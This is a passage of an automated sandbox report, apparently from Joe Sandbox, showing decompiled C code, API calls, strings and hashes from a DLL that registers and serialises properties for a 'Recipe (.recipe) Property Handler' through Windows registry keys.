							 *((intOrPtr*)( *_t89 + 8))(_t89);
							goto L20;
						}
						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
						_t137 = _t93;
						if(_t93 < 0) {
							goto L21;
						}
						_t94 = _v1056;
						_t134 =  &_v1052;
						_v1052 = 0;
						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
						_t137 = _t95;
						if(_t95 < 0) {
							goto L20;
						}
						asm("xorps xmm0, xmm0");
						asm("movq [ebp-0x448], xmm0");
						asm("movq [ebp-0x440], xmm0");
						_t98 = E10002390( &_v528,  &_v1100);
						_t137 = _t98;
						if(_t98 >= 0) {
							asm("xorps xmm0, xmm0");
							asm("movq [ebp-0x438], xmm0");
							asm("movq [ebp-0x430], xmm0");
							_t100 = E10002390(_v1068,  &_v1084);
							_t136 = __imp__#9;
							_t137 = _t100;
							if(_t100 >= 0) {
								_t129 = _v1052;
								asm("movq xmm0, [ebp-0x448]");
								_t134 =  *_t129;
								asm("movq [eax], xmm0");
								asm("movq xmm0, [ebp-0x440]");
								asm("movq [eax+0x8], xmm0");
								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
								_t137 = _t104;
								if(_t104 >= 0) {
									_t130 = _v1052;
									asm("movq xmm0, [ebp-0x438]");
									_t134 =  *_t130;
									asm("movq [eax], xmm0");
									asm("movq xmm0, [ebp-0x430]");
									asm("movq [eax+0x8], xmm0");
									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
								}
								 *_t136( &_v1084);
							}
							 *_t136( &_v1100);
						}
						goto L19;
					}
					_t109 =  *((intOrPtr*)(_t115 + 0x18));
					_t134 =  &_v1052;
					_v1052 = 0;
					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
					_t137 = _t110;
					if(_t110 < 0) {
						goto L22;
					}
					_t132 = _v1056;
					_t134 =  &_v1060;
					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
					_t137 = _t112;
					_t113 = _v1052;
					 *((intOrPtr*)( *_t113 + 8))(_t113);
					_t152 = _t112;
					goto L6;
				}
			}

0x10002f79
0x10002f80
0x10002f85
0x10002f89
0x10002f9a
0x10002f9c
0x10002fa4
0x10002fb1
0x10002fb9
0x10003285
0x10003295
0x10002fd7
0x10002fd7
0x10002fda
0x10002fe0
0x10002fee
0x10002ff6
0x10003272
0x10003277
0x1000327d
0x00000000
0x10003283
0x10002ffc
0x10003002
0x10003009
0x10003017
0x1000301d
0x10003023
0x10003027
0x1000307e
0x1000307e
0x10003264
0x10003264
0x1000326d
0x00000000
0x1000326d
0x1000309c
0x100030a1
0x100030a8
0x10003258
0x10003258
0x10003261
0x00000000
0x10003261
0x100030b2
0x100030bc
0x100031fe
0x1000320d
0x10003215
0x1000321b
0x1000321f
0x00000000
0x00000000
0x10003221
0x10003227
0x10003237
0x1000323a
0x1000323e
0x1000324c
0x1000324c
0x10003255
0x00000000
0x10003255
0x10003240
0x10003240
0x10003249
0x00000000
0x10003249
0x100030dd
0x100030e2
0x100030e6
0x00000000
0x00000000
0x100030ec
0x100030f2
0x100030f9
0x1000310b
0x1000310d
0x10003111
0x00000000
0x00000000
0x1000311e
0x10003128
0x10003130
0x10003138
0x1000313d
0x10003144
0x10003157
0x1000315a
0x10003162
0x1000316a
0x1000316f
0x10003175
0x1000317c
0x1000317e
0x10003184
0x1000318c
0x10003198
0x1000319c
0x100031a5
0x100031aa
0x100031b0
0x100031b4
0x100031b6
0x100031bc
0x100031c4
0x100031d0
0x100031d4
0x100031dd
0x100031e8
0x100031e8
0x100031f1
0x100031f1
0x100031fa
0x100031fa
0x00000000
0x10003144
0x10003029
0x1000302c
0x10003033
0x10003045
0x1000304b
0x1000304f
0x00000000
0x00000000
0x10003055
0x1000305b
0x1000306b
0x1000306e
0x10003070
0x10003079
0x1000307c
0x00000000
0x1000307c

APIs

_memset.LIBCMT ref: 10002F9C
PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1

Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6

VariantClear.OLEAUT32(?), ref: 100031F1
VariantClear.OLEAUT32(?), ref: 100031FA
CoTaskMemFree.OLE32(?), ref: 1000327D

Strings

Key, xrefs: 10003193
EncodedValue, xrefs: 100031CB
Property, xrefs: 100030D0
Property[@Key = '%s'], xrefs: 1000308B
ExtendedProperties, xrefs: 10003011, 1000303F

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
API String ID: 2822920939-4160240301
Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10007719, Relevance: 16.7, APIs: 11, Instructions: 229
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E10007719(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t81;
				void* _t86;
				long _t90;
				intOrPtr _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				intOrPtr* _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				signed int _t130;
				signed int* _t134;
				intOrPtr _t135;
				signed int* _t138;
				void** _t139;
				intOrPtr _t141;
				void* _t142;
				signed int _t143;
				void** _t147;
				signed int _t149;
				void* _t150;
				void** _t154;
				void* _t155;

				_push(0x64);
				_push(0x10010d68);
				E10008040(__ebx, __edi, __esi);
				E100091AB(0xb);
				_t130 = 0;
				 *(_t155 - 4) = 0;
				if( *0x10014c80 == 0) {
					_push(0x40);
					_t141 = 0x20;
					_push(_t141);
					_t81 = E10007F1D();
					_t134 = _t81;
					 *(_t155 - 0x24) = _t134;
					if(_t134 != 0) {
						 *0x10014c80 = _t81;
						 *0x10014c64 = _t141;
						while(_t134 <  &(_t81[0x200])) {
							_t134[1] = 0xa00;
							 *_t134 =  *_t134 | 0xffffffff;
							_t134[2] = _t130;
							_t134[9] = _t134[9] & 0x00000080;
							_t134[9] = _t134[9] & 0x0000007f;
							_t134[9] = 0xa0a;
							_t134[0xe] = _t130;
							_t134[0xd] = _t130;
							_t134 =  &(_t134[0x10]);
							 *(_t155 - 0x24) = _t134;
							_t81 =  *0x10014c80;
						}
						GetStartupInfoW(_t155 - 0x74);
						if( *((short*)(_t155 - 0x42)) == 0) {
							while(1) {
								L31:
								 *(_t155 - 0x2c) = _t130;
								if(_t130 >= 3) {
									break;
								}
								_t147 =  *0x10014c80 + (_t130 << 6);
								 *(_t155 - 0x24) = _t147;
								if( *_t147 == 0xffffffff ||  *_t147 == 0xfffffffe) {
									_t147[1] = 0x81;
									if(_t130 != 0) {
										_t66 = _t130 - 1; // -1
										asm("sbb eax, eax");
										_t90 =  ~_t66 + 0xfffffff5;
									} else {
										_t90 = 0xfffffff6;
									}
									_t142 = GetStdHandle(_t90);
									if(_t142 == 0xffffffff || _t142 == 0) {
										L47:
										_t147[1] = _t147[1] | 0x00000040;
										 *_t147 = 0xfffffffe;
										_t94 =  *0x10013c48; // 0x0
										if(_t94 != 0) {
											 *( *((intOrPtr*)(_t94 + _t130 * 4)) + 0x10) = 0xfffffffe;
										}
										goto L49;
									} else {
										_t98 = GetFileType(_t142);
										if(_t98 == 0) {
											goto L47;
										}
										 *_t147 = _t142;
										_t99 = _t98 & 0x000000ff;
										if(_t99 != 2) {
											if(_t99 != 3) {
												L46:
												_t70 =  &(_t147[3]); // -268520564
												InitializeCriticalSectionAndSpinCount(_t70, 0xfa0);
												_t147[2] = _t147[2] + 1;
												goto L49;
											}
											_t103 = _t147[1] | 0x00000008;
											L45:
											_t147[1] = _t103;
											goto L46;
										}
										_t103 = _t147[1] | 0x00000040;
										goto L45;
									}
								} else {
									_t147[1] = _t147[1] | 0x00000080;
									L49:
									_t130 = _t130 + 1;
									continue;
								}
							}
							 *(_t155 - 4) = 0xfffffffe;
							E100079DD();
							L2:
							_t86 = 1;
							L3:
							return E10008085(_t86);
						}
						_t105 =  *((intOrPtr*)(_t155 - 0x40));
						if(_t105 == 0) {
							goto L31;
						}
						_t135 =  *_t105;
						 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
						_t106 = _t105 + 4;
						 *((intOrPtr*)(_t155 - 0x28)) = _t106;
						 *(_t155 - 0x20) = _t106 + _t135;
						if(_t135 >= 0x800) {
							_t135 = 0x800;
							 *((intOrPtr*)(_t155 - 0x1c)) = 0x800;
						}
						_t149 = 1;
						 *(_t155 - 0x30) = 1;
						while( *0x10014c64 < _t135) {
							_t138 = E10007F1D(_t141, 0x40);
							 *(_t155 - 0x24) = _t138;
							if(_t138 != 0) {
								0x10014c80[_t149] = _t138;
								 *0x10014c64 =  *0x10014c64 + _t141;
								while(_t138 <  &(0x10014c80[_t149][0x200])) {
									_t138[1] = 0xa00;
									 *_t138 =  *_t138 | 0xffffffff;
									_t138[2] = _t130;
									_t138[9] = _t138[9] & 0x00000080;
									_t138[9] = 0xa0a;
									_t138[0xe] = _t130;
									_t138[0xd] = _t130;
									_t138 =  &(_t138[0x10]);
									 *(_t155 - 0x24) = _t138;
								}
								_t149 = _t149 + 1;
								 *(_t155 - 0x30) = _t149;
								_t135 =  *((intOrPtr*)(_t155 - 0x1c));
								continue;
							}
							_t135 =  *0x10014c64;
							 *((intOrPtr*)(_t155 - 0x1c)) = _t135;
							break;
						}
						_t143 = _t130;
						 *(_t155 - 0x2c) = _t143;
						_t109 =  *((intOrPtr*)(_t155 - 0x28));
						_t139 =  *(_t155 - 0x20);
						while(_t143 < _t135) {
							_t150 =  *_t139;
							if(_t150 == 0xffffffff || _t150 == 0xfffffffe) {
								L26:
								_t143 = _t143 + 1;
								 *(_t155 - 0x2c) = _t143;
								_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
								 *((intOrPtr*)(_t155 - 0x28)) = _t109;
								_t139 =  &(_t139[1]);
								 *(_t155 - 0x20) = _t139;
								continue;
							} else {
								_t111 =  *_t109;
								if((_t111 & 0x00000001) == 0) {
									goto L26;
								}
								if((_t111 & 0x00000008) != 0) {
									L24:
									_t154 = 0x10014c80[_t143 >> 5] + ((_t143 & 0x0000001f) << 6);
									 *(_t155 - 0x24) = _t154;
									 *_t154 =  *_t139;
									_t154[1] =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
									_t38 =  &(_t154[3]); // 0xd
									InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
									_t154[2] = _t154[2] + 1;
									_t139 =  *(_t155 - 0x20);
									L25:
									_t135 =  *((intOrPtr*)(_t155 - 0x1c));
									goto L26;
								}
								_t119 = GetFileType(_t150);
								_t139 =  *(_t155 - 0x20);
								if(_t119 == 0) {
									goto L25;
								}
								goto L24;
							}
						}
						goto L31;
					}
					E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
					_t86 = 0;
					goto L3;
				}
				E10009330(_t155, 0x10012158, _t155 - 0x10, 0xfffffffe);
				goto L2;
			}

0x10007719
0x1000771b
0x10007720
0x10007727
0x1000772d
0x1000772f
0x10007738
0x10007758
0x1000775c
0x1000775d
0x1000775e
0x10007765
0x10007767
0x1000776c
0x10007785
0x1000778a
0x10007790
0x10007799
0x1000779f
0x100077a2
0x100077a5
0x100077ae
0x100077b1
0x100077b7
0x100077ba
0x100077bd
0x100077c0
0x100077c3
0x100077c3
0x100077ce
0x100077d9
0x10007908
0x10007908
0x10007908
0x1000790e
0x00000000
0x00000000
0x10007919
0x1000791f
0x10007925
0x1000793a
0x10007940
0x10007947
0x1000794c
0x1000794e
0x10007942
0x10007944
0x10007944
0x10007958
0x1000795d
0x100079a4
0x100079aa
0x100079ad
0x100079b3
0x100079ba
0x100079bf
0x100079bf
0x00000000
0x10007963
0x10007964
0x1000796c
0x00000000
0x00000000
0x1000796e
0x10007970
0x10007978
0x10007985
0x10007990
0x10007995
0x10007999
0x1000799f
0x00000000
0x1000799f
0x1000798b
0x1000798d
0x1000798d
0x00000000
0x1000798d
0x1000797e
0x00000000
0x1000797e
0x1000792c
0x10007932
0x100079c6
0x100079c6
0x00000000
0x100079c6
0x10007925
0x100079cc
0x100079d3
0x1000774d
0x1000774f
0x10007750
0x10007755
0x10007755
0x100077df
0x100077e4
0x00000000
0x00000000
0x100077ea
0x100077ec
0x100077ef
0x100077f2
0x100077f7
0x10007801
0x10007803
0x10007805
0x10007805
0x1000780a
0x1000780b
0x1000780e
0x10007820
0x10007822
0x10007827
0x100078bb
0x100078c2
0x100078c8
0x100078d8
0x100078de
0x100078e1
0x100078e4
0x100078e8
0x100078ee
0x100078f1
0x100078f4
0x100078f7
0x100078f7
0x100078fc
0x100078fd
0x10007900
0x00000000
0x10007900
0x1000782d
0x10007833
0x00000000
0x10007833
0x10007836
0x10007838
0x1000783b
0x1000783e
0x10007841
0x10007849
0x1000784e
0x100078a8
0x100078a8
0x100078a9
0x100078af
0x100078b0
0x100078b3
0x100078b6
0x00000000
0x10007855
0x10007855
0x10007859
0x00000000
0x00000000
0x1000785d
0x1000786d
0x1000787a
0x10007881
0x10007886
0x1000788d
0x10007895
0x10007899
0x1000789f
0x100078a2
0x100078a5
0x100078a5
0x00000000
0x100078a5
0x10007860
0x10007866
0x1000786b
0x00000000
0x00000000
0x00000000
0x1000786b
0x1000784e
0x00000000
0x10007841
0x10007779
0x10007781
0x00000000
0x10007781
0x10007745
0x00000000

APIs

__lock.LIBCMT ref: 10007727

Part of subcall function 100091AB: __mtinitlocknum.LIBCMT ref: 100091BD
Part of subcall function 100091AB: __amsg_exit.LIBCMT ref: 100091C9
Part of subcall function 100091AB: EnterCriticalSection.KERNEL32(10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100091D6

@_EH4_CallFilterFunc@8.LIBCMT ref: 10007745
__calloc_crt.LIBCMT ref: 1000775E
@_EH4_CallFilterFunc@8.LIBCMT ref: 10007779
GetStartupInfoW.KERNEL32(?,10010D68,00000064), ref: 100077CE
__calloc_crt.LIBCMT ref: 10007819
GetFileType.KERNEL32 ref: 10007860
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10007899
GetStdHandle.KERNEL32(-000000F6), ref: 10007952
GetFileType.KERNEL32 ref: 10007964
InitializeCriticalSectionAndSpinCount.KERNEL32(-10014C74,00000FA0), ref: 10007999

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 301580142-0
Opcode ID: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction ID: 674899b519222b2de9a2fae7d59f7574afda57542dcf9298ac8c6c73304dea21
Opcode Fuzzy Hash: 088a7012e71482eaac8ccea2c5f7aaa90addffb71c1835bf8ac898b157d3edf4
Instruction Fuzzy Hash: 6391D370D053569FEB10CF68C88059DBBF0FF462A0B25826DD4AAA73E5DB38D842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10003400, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 85
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E10003400(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				int _t26;
				wchar_t* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				void* _t40;
				WCHAR* _t41;
				short _t42;
				signed int _t44;
				void* _t48;
				short _t52;

				_t20 =  *0x10012158; // 0x6bf92ee
				_v8 = _t20 ^ _t44;
				_t37 = _a8;
				_v1036 = _a4;
				_t41 = _a12;
				_v1040 = _a16;
				_t42 = 0;
				_t26 = vswprintf( &_v1032, 0x1ff, _t41,  &_a24);
				if(_t26 < 0) {
					L4:
					_t42 = 0x8007007a;
					goto L5;
				} else {
					_t48 = _t26 - 0x1ff;
					if(_t48 > 0) {
						goto L4;
					} else {
						if(_t48 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t42 >= 0) {
					_t32 =  &_v1032;
					__imp__RegSetKeyValueW(_t37, _t32, _v1040, 1, _a20, lstrlenW(_a20) + _t30);
					_t42 = _t32;
					if(_t42 > 0) {
						_t52 = _t42;
					}
					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}

0x10003409
0x10003410
0x10003417
0x1000341b
0x10003425
0x10003428
0x1000343f
0x10003441
0x1000344b
0x10003458
0x10003458
0x00000000
0x1000344d
0x1000344d
0x10003452
0x00000000
0x10003454
0x10003454
0x1000345d
0x1000345f
0x1000345f
0x10003454
0x10003452
0x10003465
0x1000347a
0x1000348a
0x10003490
0x10003494
0x1000349f
0x1000349f
0x100034a1
0x100034a3
0x100034b0
0x100034ba
0x100034c2
0x100034e2
0x100034e8
0x100034c4
0x100034c4
0x100034d4
0x00000000
0x00000000
0x100034d4
0x100034c2
0x100034b0
0x100034a1
0x10003501

APIs

vswprintf.LIBCMT ref: 10003441

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
StrCmpNICW.SHLWAPI(06BF92EE,Software\Classes\%s,00000013), ref: 100034BA
StrStrIW.SHLWAPI(06BF92EE,PropertyHandlers), ref: 100034D0
StrStrIW.SHLWAPI(06BF92EE,KindMap), ref: 100034DC

Strings

PropertyHandlers, xrefs: 100034CA
KindMap, xrefs: 100034D6
Software\Classes\%s, xrefs: 100034B4

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Value__vsnwprintf_llstrlenvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1581644826-984809517
Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0x6bf92ee
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}

0x10003519
0x10003520
0x10003527
0x1000352b
0x10003535
0x10003538
0x1000354f
0x10003551
0x1000355b
0x10003568
0x10003568
0x00000000
0x1000355d
0x1000355d
0x10003562
0x00000000
0x10003564
0x10003564
0x1000356d
0x1000356f
0x1000356f
0x10003564
0x10003562
0x10003575
0x10003585
0x1000358d
0x10003593
0x10003597
0x100035a2
0x100035a2
0x100035a4
0x100035a6
0x100035b3
0x100035bd
0x100035c5
0x100035e5
0x100035eb
0x100035c7
0x100035c7
0x100035d7
0x00000000
0x00000000
0x100035d7
0x100035c5
0x100035b3
0x100035a4
0x10003604

APIs

vswprintf.LIBCMT ref: 10003551

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
StrCmpNICW.SHLWAPI(06BF92EE,Software\Classes\%s,00000013), ref: 100035BD
StrStrIW.SHLWAPI(06BF92EE,PropertyHandlers), ref: 100035D3
StrStrIW.SHLWAPI(06BF92EE,KindMap), ref: 100035DF

Strings

PropertyHandlers, xrefs: 100035CD
KindMap, xrefs: 100035D9
Software\Classes\%s, xrefs: 100035B7
Recipe (.recipe) Property Handler, xrefs: 1000352A

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Value__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
API String ID: 396321892-1357300599
Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76
registryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0x6bf92ee
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}

0x10003319
0x10003320
0x10003328
0x1000332b
0x10003344
0x10003346
0x10003350
0x1000335d
0x1000335d
0x10003362
0x10003364
0x10003368
0x1000336a
0x1000336c
0x10003374
0x1000337a
0x1000337e
0x10003383
0x10003383
0x1000337e
0x10003389
0x1000338e
0x10003390
0x1000339d
0x100033a7
0x100033af
0x100033d7
0x100033d7
0x100033af
0x1000339d
0x100033e9
0x100033ed
0x100033fa
0x100033fa
0x10003352
0x10003357
0x00000000
0x00000000
0x10003359
0x00000000
0x1000335b
0x00000000
0x1000335b

APIs

vswprintf.LIBCMT ref: 10003346

Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C

RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7

Strings

PropertyHandlers, xrefs: 100033B1
KindMap, xrefs: 100033C1
Software\Classes\%s, xrefs: 100033A1

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: DeleteTree__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1945471109-984809517
Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
